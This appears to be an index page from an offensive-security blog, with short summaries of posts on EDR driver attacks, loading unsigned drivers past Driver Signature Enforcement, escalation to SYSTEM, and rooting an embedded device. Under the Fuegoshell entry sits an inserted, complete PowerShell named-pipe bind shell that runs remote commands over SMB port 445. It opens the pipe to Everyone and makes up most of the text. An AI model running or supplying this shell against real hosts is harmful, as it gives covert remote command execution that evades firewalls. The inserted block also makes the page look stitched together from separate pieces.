The SuperFetch Query superpower

In the previous blog post, Fixing (Windows Internals) Meminfo.exe, we dug into the Meminfo.exe tool from the Windows Internals book, focusing on “FileInfo” requests. This post looks at another request type, “SuperFetchQuery”, which can be useful in scenarios such as red team / privilege escalation, pentest, exploit development or malware development. Let’s take a look!

Fixing (Windows Internals) Meminfo.exe

A while ago I started reading the Windows Internals books and discovered the Meminfo.exe tool, which retrieves information about physical and virtual memory.
Some options produced no output or crashed the program. After analysing the MemInfo source code and reversing the fileinfo.sys driver, I found some quick (and dirty) fixes. They may help if someone else runs into the same issues.

Fuegoshell : Windows remote shell re-using TCP 445

In this short blog post we discuss how named pipes and PowerShell one-liners can be used to build a Windows bind or reverse shell over the SMB port (TCP 445), so that no additional listening port has to be opened.
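To make the mechanism concrete, here is an added example of a minimal named-pipe bind shell in Windows PowerShell 5.1. It is not Fuegoshell’s code; the pipe name (`demo_pipe`), the target hostname (`target-host`) and the `<END>` delimiter are assumptions for illustration. A named pipe created on the server is reachable from another host as `\\target-host\pipe\demo_pipe`, which the SMB client carries over TCP 445 through the IPC$ share.

```powershell
# Added example (not Fuegoshell's own code): a named-pipe "bind shell".
# ---- Server side (run on the target; Windows PowerShell 5.1 / .NET Framework) ----
$pipeName = 'demo_pipe'   # assumed pipe name for the example

# Grant Everyone read/write so a remote, SMB-authenticated client can open the pipe.
$ps = New-Object System.IO.Pipes.PipeSecurity
$ps.AddAccessRule((New-Object System.IO.Pipes.PipeAccessRule('Everyone', 'ReadWrite', 'Allow')))

$server = New-Object System.IO.Pipes.NamedPipeServerStream(
    $pipeName,
    [System.IO.Pipes.PipeDirection]::InOut,
    1,                                              # single instance
    [System.IO.Pipes.PipeTransmissionMode]::Byte,
    [System.IO.Pipes.PipeOptions]::None,
    4096, 4096,                                     # in/out buffer sizes
    $ps)

$server.WaitForConnection()                         # blocks until \\target-host\pipe\demo_pipe is opened
$reader = New-Object System.IO.StreamReader($server)
$writer = New-Object System.IO.StreamWriter($server)
$writer.AutoFlush = $true

# One command per line; reply with the output followed by a delimiter line.
while ($server.IsConnected -and ($null -ne ($cmd = $reader.ReadLine()))) {
    if ($cmd -eq 'exit') { break }
    try   { $out = Invoke-Expression $cmd 2>&1 | Out-String }
    catch { $out = $_.Exception.Message }
    $writer.Write($out)
    $writer.WriteLine('<END>')                      # assumed end-of-output marker
}
$server.Dispose()

# ---- Client side (run from the attacker host; authenticates to the target over SMB/445) ----
$client = New-Object System.IO.Pipes.NamedPipeClientStream('target-host', 'demo_pipe', [System.IO.Pipes.PipeDirection]::InOut)
$client.Connect(10000)                              # timeout in milliseconds
$cr = New-Object System.IO.StreamReader($client)
$cw = New-Object System.IO.StreamWriter($client)
$cw.AutoFlush = $true

$cw.WriteLine('whoami')
while ((($line = $cr.ReadLine()) -ne $null) -and ($line -ne '<END>')) { $line }

$cw.WriteLine('exit')
$client.Dispose()
```

Two caveats a practitioner should keep in mind: remote access to the pipe still requires an authenticated SMB session on the target (anonymous access to arbitrary pipes is not allowed by default), so the client needs valid credentials; and TCP 445 must already be reachable, for example because File and Printer Sharing is enabled on the host firewall. The benefit is that the shell traffic rides an existing, expected service rather than a new listening port. On PowerShell 7 the `PipeSecurity` constructor overload used above is not available; `System.IO.Pipes.NamedPipeServerStreamAcl` is the equivalent there.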

EDRSnowblast - blizzard on EDR drivers

After the sandstorm it’s time for the blizzard! The well-known EDRSandblast tool is a fantastic code base for investigating the Windows kernel. After making several modifications I decided to fork the project, and I want to share the details with the community.

Windows kernel driver static reverse using IDA and GHIDRA

Here are some notes for the Windows driver reverse-engineering beginner. The topic is already well covered and many resources exist on the Internet; here we use both IDA and GHIDRA on the same driver and observe the differences.

Loading unsigned Windows drivers without reboot

The previous post showed how to create a weaponized driver. How can we load such an unsigned driver into the Windows kernel, bypassing Driver Signature Enforcement (DSE), without rebooting? Here are some details about that.

How to get local root shell on the LG HR598 Bluray

For a long time I wondered how to pwn embedded (or IoT) devices. I managed to get a root shell on my old LG HR598 Blu-ray player; here are some notes about my hardware hacking journey.

Pimp my PID - get SYSTEM using Windows kernel

During my journey into the Windows kernel I found it interesting to build a tool that elevates any process to SYSTEM using a driver. Here are some details about that.